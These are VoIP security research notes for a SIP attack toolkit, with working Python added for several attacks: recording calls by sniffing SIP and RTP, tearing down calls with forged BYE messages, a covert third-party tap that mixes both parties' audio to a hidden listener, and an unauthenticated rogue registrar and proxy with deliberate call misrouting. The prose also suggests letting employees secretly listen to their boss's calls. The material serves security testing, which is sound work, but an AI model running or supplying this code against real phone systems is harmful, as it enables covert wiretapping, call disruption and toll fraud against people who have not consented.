    Copyright (c)  2004  Mark D. Collier
    Permission is granted to copy, distribute and/or modify this document
    under the terms of the GNU Free Documentation License, Version 1.2
    or any later version published by the Free Software Foundation;
    with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.
    A copy of the license is included in the section entitled "GNU
    Free Documentation License".

Author: Mark D. Collier - 12/01/2006   v1.1
        Mark D. Collier - 04/26/2004   v1.0
        www.securelogix.com - mark.collier@securelogix.com
        www.hackingexposedvoip.com

This tool was produced with honorable intentions, which are:

  o To aid owners of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in their deployments.

  o To aid 3rd parties to test, audit, and uncover security vulnerabilities
    in the VoIP infrastructure of owners of said infrastructure who contract
    with or otherwise expressly approve said 3rd parties to assess said
    VoIP infrastructure.

  o To aid producers of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in the VoIP hardware/software/systems they produce.

  o For use in collective educational endeavors or use by individuals for
    their own intellectual curiosity, amusement, or aggrandizement - absent
    nefarious intent.
   
Unlawful use of this tool is strictly prohibited.

                         NOTES ABOUT THE RESEARCH


Call Recording

    Modifying the source code of 'tcpdump', a known network sniffer tool,
    seemed to be the best way to achieve VoIP call recording. However, a
    review of the tcpdump code determined that 'libpcap', the underlying
    packet capturing library, was doing most of the work. So, a new tool,
    named 'capture', was created using just libpcap.

    To limit the scope of the proof-of-concept tool, only UDP based SIP
    calls are recorded. All UDP packets are scanned to determine if they
    appear to be SIP, and further analyzed to discover which ports contain
    the RTP media. All those matching packets are then written to disk,
    with an option to make separate files by call or just one single file
    for all calls.

    The files written are in a standard format that other analysis tools
    can read. One such tool, Ethereal, is used to extract the RTP media
    payload and convert it to an audio file, which can then be replayed out
    the speakers. For each standard call, there are two audio streams, one
    to the caller and one from the caller. For this proof-of-concept, the
    audio streams are not merged for combined playback.

    Additionally, the wiretap tool became the most logical place to gather
    user names, URIs, and authentication data for analysis by other tools.

    The wiretap tool can capture calls completely transparently when
    installed on ethernet bridge hardware with no configured IP presence.
    In that case there is no possibility of accidental packet creation or
    transmission, just packet recording. The same tool can also be
    installed on an existing host, capturing all calls to and from that
    host, but the chance of detection is greater in that case.

    This 'capture' tool has been developed for Red Hat Linux 9, however it
    should compile on most any Linux variant and easily port to most any
    Unix variant. Creating a Windows version would be more difficult but,
    by using Cygwin and winpcap, it seems quite possible.


Session Tear Down

    As discovered when implementing SecureLogix' other products, tearing
    down unauthenticated SIP calls is trivial. The simplest way to show
    this concept was to add a session tear down option to 'capture', the
    wiretap tool.

    There are several stages at which a session can be torn down. The
    simplest to handle is just after a call has been fully established. By
    then enough data (Call-ID, From/To tags, CSeq numbers, Contacts) has
    been gathered to send a BYE message to each end point, terminating the
    call.

    A more difficult case, not implemented within the wiretap tool, is to
    terminate calls before they are even established. This can be done by
    sending a CANCEL message to the callee and a BUSY, NOT FOUND, or other
    failure response to the caller. However, the spoofed messages may
    arrive after the real 200 OK and ACK messages, in which case the
    CANCEL and BUSY would be ignored. To cover that race, the BYE messages
    should be sent as well.

    A last case, also not implemented with the wiretap tool, is to
    terminate calls after a certain period of time. In this case, all
    messages between the two end points must be carefully monitored to keep
    data, such as the CSeq numbers, up to date. When the terminate time
    arrives, the proper BYE messages can then be sent.
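    The following is an added example, not the 'capture' tool's own code.
    It covers both the call recording step above (scan each UDP payload for
    something that looks like SIP, pull the audio address and port out of
    the SDP carried by the INVITE and its 200 OK, and use them to pick the
    RTP packets out of the stream) and the simplest tear down case (once
    the ACK has been seen, forge a BYE toward each end point from the
    Call-ID, tags, Contacts and CSeq numbers already gathered). The
    INVITE / 200 OK / ACK exchange, the addresses, the Via host in the
    forged BYE and the class names are all constructed for the example.

```python
import re
TAG_RE = re.compile(r";tag=([^;>\s]+)")

def uri_of(header):                      # 'Alice <sip:alice@host>;tag=x' -> 'sip:alice@host'
    m = re.search(r"<([^>]+)>", header)
    return m.group(1) if m else header.split(";")[0].strip()

def tag_of(header):                      # dialog tag of a From/To header, "" if none yet
    m = TAG_RE.search(header)
    return m.group(1) if m else ""

def parse_sip(payload):                  # -> (start line, {lowercase name: [values]}, body)
    head, _, body = payload.decode("utf-8", "replace").partition("\r\n\r\n")
    lines, headers = head.split("\r\n"), {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body

def sdp_audio(body):                     # (ip, port) from the c= line in force and m=audio
    ip = port = None
    for line in body.splitlines():
        if line.startswith("c="):
            ip = line.split()[2]
        elif line.startswith("m=audio "):
            port = int(line.split()[1])
    return (ip, port) if ip and port else None

class Party:                             # one end of the call
    def __init__(self, uri="", tag="", contact="", media=None, cseq=0):
        self.uri, self.tag, self.contact, self.media, self.cseq = uri, tag, contact, media, cseq
class Dialog:
    def __init__(self, call_id, caller, callee):
        self.call_id, self.caller, self.callee, self.established = call_id, caller, callee, False
class DialogTracker:
    def __init__(self):
        self.dialogs = {}

    def ingest(self, payload):
        """Feed one UDP payload; returns the Dialog it belongs to, or None."""
        first = payload.split(b"\r\n", 1)[0]
        if not (first.startswith(b"SIP/2.0 ") or first.endswith(b" SIP/2.0")):
            return None                                   # does not look like SIP
        start, h, body = parse_sip(payload)
        call_id, (cseq_num, cseq_method) = h["call-id"][0], h["cseq"][0].split()
        from_hdr, to_hdr = h["from"][0], h["to"][0]
        contact = uri_of(h.get("contact", [""])[0])
        d = self.dialogs.get(call_id)
        if d is None:
            if not start.startswith("INVITE "):
                return None                               # a dialog we did not see begin
            caller = Party(uri_of(from_hdr), tag_of(from_hdr), contact, sdp_audio(body), int(cseq_num))
            d = self.dialogs[call_id] = Dialog(call_id, caller, Party(uri_of(to_hdr)))
        elif start.startswith("SIP/2.0 200") and cseq_method == "INVITE":
            d.callee.tag, d.callee.contact, d.callee.media = tag_of(to_hdr), contact, sdp_audio(body)
        elif start.startswith("ACK "):
            d.established = True
        elif not start.startswith("SIP/2.0"):             # any other in-dialog request
            sender = d.caller if tag_of(from_hdr) == d.caller.tag else d.callee
            sender.cseq = int(cseq_num)                   # keep the per-direction CSeq current
        return d

    def is_rtp(self, src, dst):          # UDP packet between the media ends of an established call?
        return any({src, dst} == {d.caller.media, d.callee.media}
                   for d in self.dialogs.values() if d.established)

def forged_bye(d, sender, receiver, via_host="203.0.113.7"):
    """BYE toward `receiver` that claims to come from `sender`. via_host is an
    assumption: a tap with no IP presence never sees the 200 OK to the BYE anyway."""
    return ("BYE {} SIP/2.0\r\nVia: SIP/2.0/UDP {};branch=z9hG4bK-{}-{}\r\n"
            "From: <{}>;tag={}\r\nTo: <{}>;tag={}\r\nCall-ID: {}\r\n"
            "CSeq: {} BYE\r\nContent-Length: 0\r\n\r\n").format(
                receiver.contact, via_host, sender.tag, sender.cseq + 1, sender.uri, sender.tag,
                receiver.uri, receiver.tag, d.call_id, sender.cseq + 1).encode()

def bye_pair(d):                         # the two messages injected once the call is up
    return forged_bye(d, d.caller, d.callee), forged_bye(d, d.callee, d.caller)

def sip(start, headers, body=""):        # constructed message with a correct Content-Length
    return (start + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers)
            + f"Content-Length: {len(body)}\r\n\r\n" + body).encode()

# Constructed INVITE / 200 OK / ACK between two phones with no proxy in the path.
SDP_A = "v=0\r\no=- 1 1 IN IP4 10.0.0.10\r\ns=-\r\nc=IN IP4 10.0.0.10\r\nt=0 0\r\nm=audio 49170 RTP/AVP 0\r\n"
SDP_B = SDP_A.replace("10.0.0.10", "10.0.0.20").replace("49170", "3456")
FROM, CID = ("From", "Alice <sip:alice@10.0.0.10>;tag=1928301774"), ("Call-ID", "a84b4c76e66710@10.0.0.10")
TO, TO_TAGGED = ("To", "Bob <sip:bob@10.0.0.20>"), ("To", "Bob <sip:bob@10.0.0.20>;tag=a6c85cf")
SDP = ("Content-Type", "application/sdp")
INVITE = sip("INVITE sip:bob@10.0.0.20 SIP/2.0", [FROM, TO, CID, ("CSeq", "314159 INVITE"),
             ("Contact", "<sip:alice@10.0.0.10:5060>"), SDP], SDP_A)
OK_200 = sip("SIP/2.0 200 OK", [FROM, TO_TAGGED, CID, ("CSeq", "314159 INVITE"),
             ("Contact", "<sip:bob@10.0.0.20:5060>"), SDP], SDP_B)
ACK = sip("ACK sip:bob@10.0.0.20:5060 SIP/2.0", [FROM, TO_TAGGED, CID, ("CSeq", "314159 ACK")])

def track_sample_call():                 # -> (tracker, the established Dialog)
    t = DialogTracker()
    for pkt in (INVITE, OK_200, ACK):
        d = t.ingest(pkt)
    return t, d
```

    Note the per-direction CSeq: the BYE toward the callee continues the
    caller's sequence (314160), while the BYE toward the caller starts the
    callee's, since no request from that side was observed. Phones check
    this, so a tap that loses track of in-dialog requests will have its
    BYEs rejected as out of order.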


Third Party Phone Tap

    To quickly create a proof-of-concept live tap tool, the existing
    SecureLogix' SIP call generator code was modified. The first step was
    to allow the 'sip_rogue' to be the man-in-the-middle. The caller
    calls the sip_rogue which then calls the callee and relays the audio
    data across the two calls. The caller and callee are aware of only
    one call.

    Next, the tool was modified to place a third call to the tap party. The
    audio from the first two calls is mixed and sent to the tap party. So
    as not to give away the presence of the third-party listener, no audio
    is accepted from this third call.

    The 'sip_rogue' tool has no audio buffers, nor does it even decode and
    re-encode the audio stream (except in the case of the tap party). It
    simply relays the last audio packet it received when it is time to
    send. This can cause drop outs, warbling, echo, and other odd effects
    over the course of the call. However, the audio was adequate on a fast
    machine and was deemed good enough for our purposes during development.
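    An added example, not sip_rogue's code, of the one step where the tap
    leg does decode and re-encode: the caller's and callee's G.711 u-law
    (PCMU, payload type 0) payloads are summed sample by sample, clipped,
    and sent to the tap party as a third stream that keeps only the newest
    packet from each side and drops anything the tap party sends back. The
    RTP packets, the SSRC and the 20 ms frame size are constructed
    assumptions.

```python
import struct

BIAS, CLIP = 0x84, 32635                       # G.711 u-law constants

def ulaw_decode(byte):
    """One PCMU byte -> signed 16-bit linear sample."""
    byte = ~byte & 0xFF
    exponent, mantissa = (byte >> 4) & 0x07, byte & 0x0F
    sample = (((mantissa << 3) + BIAS) << exponent) - BIAS
    return -sample if byte & 0x80 else sample

def ulaw_encode(sample):
    """Signed 16-bit linear sample -> one PCMU byte."""
    sign = 0x80 if sample < 0 else 0
    sample = min(abs(sample), CLIP) + BIAS
    exponent, mask = 7, 0x4000                 # segment = highest set bit among bits 14..7
    while exponent > 0 and not sample & mask:
        exponent, mask = exponent - 1, mask >> 1
    mantissa = (sample >> (exponent + 3)) & 0x0F
    return ~(sign | (exponent << 4) | mantissa) & 0xFF

def mix_ulaw(a, b):
    """Sum two equal-length PCMU payloads sample by sample, clipping to 16 bits
    rather than wrapping around when both sides are loud at once."""
    return bytes(ulaw_encode(max(-32768, min(32767, ulaw_decode(x) + ulaw_decode(y))))
                 for x, y in zip(a, b))

def rtp_packet(seq, ts, ssrc, payload, pt=0):
    """RTP v2 fixed header (no CSRC list, no extension) followed by the payload."""
    return struct.pack("!BBHII", 0x80, pt, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload

class TapLeg:
    """The third call. Keeps only the newest packet from each side (as the relay
    does), mixes them into one stream with its own SSRC/seq/timestamp, and never
    relays what the tap party sends. SSRC and the 160-sample frame are assumed."""
    SILENCE = bytes([0xFF]) * 160             # PCMU encoding of linear 0, 20 ms at 8 kHz

    def __init__(self, ssrc=0x5EC0F1A5):
        self.ssrc, self.seq, self.ts = ssrc, 0, 0
        self.latest = {"caller": None, "callee": None}

    def on_rtp(self, side, packet):
        self.latest[side] = packet[12:]        # drop the fixed header, keep the newest payload

    def on_rtp_from_tap(self, packet):
        return None                            # the listener's audio goes nowhere

    def next_packet(self):
        """Called every 20 ms: the mixed frame to send to the tap party."""
        a = self.latest["caller"] or self.SILENCE
        b = self.latest["callee"] or self.SILENCE
        payload = mix_ulaw(a, b)
        packet = rtp_packet(self.seq, self.ts, self.ssrc, payload)
        self.seq, self.ts = self.seq + 1, self.ts + len(payload)
        return packet
```

    Mixing with silence (0xFF) is an identity because the u-law round trip
    is exact for every code except the negative-zero byte 0x7F, which is
    why the tap leg can pad a missing side with silence without colouring
    the other side's audio.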

    Another interesting idea with this tool would be to change the third
    party tap to a random person in a call list, such as a list of
    employees. This could be used to make all the calls to the boss
    randomly go to employees as well, allowing them to listen in on
    conversations.


Rogue Proxy

    At first, modifying 'ser' or some other open source SIP proxy seemed
    to be the best approach to creating a rogue proxy. But adding the
    proxying capabilities to 'sip_rogue' provided more flexibility in a
    well known code base. Now we can create proxying end points right
    alongside regular user agents and phone tapping relay points.

    After implementing the manual creation of proxy end points, a SIP
    registrar object was added to the 'vttd'. This registrar automatically
    creates new proxy end points as phones register themselves.

    Currently, no authentication or security has been implemented in either
    the registrar or the proxy code. Further development in this area might
    be better served by going back and modifying an existing SIP proxy
    product. The main purpose of this proof-of-concept proxy was to show
    how an existing proxy could be logically replaced (using other tools)
    and therefore allow unauthenticated toll free calling.

    After establishing the basic toll avoidance capabilities, where the
    proxy properly allows all calls to go to their intended destinations,
    an option was added to randomize the destination end points for each
    call. This could be used as a maddening factor, perhaps lowering the
    frequency so that only a small percentage of calls seem to go astray.
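    An added example, not vttd or sip_rogue code: a registrar that records
    every REGISTER without challenging it, a proxy step that rewrites each
    INVITE toward the Contact it learned for the called party, and the
    randomized-destination option at a configurable rate. The REGISTER and
    INVITE messages, the proxy host and the class names are constructed for
    the example.

```python
import random, re, time

def header(msg, name):                       # first value of a header, "" if absent
    m = re.search(rf"^{name}:[ \t]*([^\r\n]*)", msg, re.M | re.I)
    return m.group(1).strip() if m else ""

def address_of(value):                       # 'Bob <sip:bob@x;transport=udp>;tag=1' -> 'sip:bob@x'
    m = re.search(r"<([^>]+)>", value)
    uri = m.group(1) if m else value.split(";")[0]
    return re.split(r"[;?]", uri.strip())[0]

class RogueRegistrar:
    """Accepts every REGISTER unchallenged and keeps AOR -> (contact, expiry time)."""
    def __init__(self, clock=time.time):
        self.bindings, self.clock = {}, clock

    def on_register(self, msg):
        user, contact = address_of(header(msg, "To")), address_of(header(msg, "Contact"))
        expires = int(header(msg, "Expires") or 3600)
        if expires == 0:
            self.bindings.pop(user, None)        # the phone is de-registering
        else:
            self.bindings[user] = (contact, self.clock() + expires)
        return user

    def lookup(self, user):
        contact, expiry = self.bindings.get(user, (None, 0))
        return contact if expiry > self.clock() else None

    def registered(self):
        return [u for u in self.bindings if self.lookup(u)]

class RogueProxy:
    """Forwards each INVITE to the contact the registrar learned. misroute_rate is the
    'maddening factor': that fraction of calls goes to a random other registered phone."""
    def __init__(self, registrar, host="10.0.0.5", misroute_rate=0.0, rng=None):
        self.registrar, self.host = registrar, host
        self.misroute_rate, self.rng = misroute_rate, rng or random.Random()

    def route(self, invite):
        """-> (chosen AOR, rewritten INVITE), or None when nobody is registered for it."""
        target = address_of(invite.split(" ", 2)[1])             # the Request-URI
        if self.rng.random() < self.misroute_rate:
            others = [u for u in self.registrar.registered() if u != target]
            if others:
                target = self.rng.choice(others)
        contact = self.registrar.lookup(target)
        if contact is None:
            return None
        _, rest = invite.split("\r\n", 1)
        rewritten = (f"INVITE {contact} SIP/2.0\r\n"
                     f"Via: SIP/2.0/UDP {self.host};branch=z9hG4bK-rogue\r\n" + rest)
        return target, rewritten

def register_msg(user, contact, expires=3600):
    """Constructed REGISTER as a phone would send it to the rogue registrar."""
    return (f"REGISTER sip:10.0.0.5 SIP/2.0\r\nVia: SIP/2.0/UDP {contact.split('@')[1]}\r\n"
            f"From: <{user}>;tag=1\r\nTo: <{user}>\r\nCall-ID: reg-{contact}\r\nCSeq: 1 REGISTER\r\n"
            f"Contact: <{contact}>\r\nExpires: {expires}\r\nContent-Length: 0\r\n\r\n")

INVITE = ("INVITE sip:bob@10.0.0.5 SIP/2.0\r\nVia: SIP/2.0/UDP 10.0.0.10\r\n"
          "From: <sip:alice@10.0.0.5>;tag=9\r\nTo: <sip:bob@10.0.0.5>\r\n"
          "Call-ID: c1\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n")

def demo(misroute_rate=0.0):
    """Three phones register, then Alice calls Bob; returns what the proxy did."""
    reg = RogueRegistrar()
    for user, contact in (("sip:alice@10.0.0.5", "sip:alice@10.0.0.10:5060"),
                          ("sip:bob@10.0.0.5", "sip:bob@10.0.0.20:5060"),
                          ("sip:carol@10.0.0.5", "sip:carol@10.0.0.30:5060")):
        reg.on_register(register_msg(user, contact))
    proxy = RogueProxy(reg, misroute_rate=misroute_rate, rng=random.Random(1))
    return reg, proxy, proxy.route(INVITE)
```

    With misroute_rate at 0 the proxy is a faithful (if unauthenticated)
    stand-in; at 0.05 roughly one call in twenty lands on the wrong phone,
    which is the low-frequency nuisance the text describes.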

